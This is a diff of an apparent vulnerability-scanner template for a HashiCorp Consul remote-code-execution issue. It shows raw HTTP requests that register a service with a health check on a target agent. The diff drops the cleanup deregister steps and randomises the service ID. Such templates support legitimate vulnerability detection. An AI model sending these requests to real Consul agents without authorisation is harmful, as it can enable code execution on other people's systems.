--- a/vulnerabilities/other/hashicorp-consul-rce.yaml
+++ b/vulnerabilities/other/hashicorp-consul-rce.yaml
@@ -9,12 +9,6 @@ info:
 
 requests:
   - raw:
-      - | # Remove USER
-        PUT /v1/agent/service/deregister/poc HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Connection: close
-
       - | # Create USER
         PUT /v1/agent/service/register HTTP/1.1
         Host: {{Hostname}}
@@ -24,8 +18,8 @@ requests:
         Content-Length: 205
 
         {
-          "ID": "poc",
-          "Name": "poc",
+          "ID": "{{randstr}}",
+          "Name": "{{randstr}}",
           "Address": "127.0.0.1",
           "Port": 80,
           "check": {
@@ -34,12 +28,6 @@ requests:
             "Timeout": "86400s"
           }
         }
-
-      - | # Remove USER
-        PUT /v1/agent/service/deregister/poc HTTP/1.1
-        Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Connection: close
 
     matchers:
       - type: word
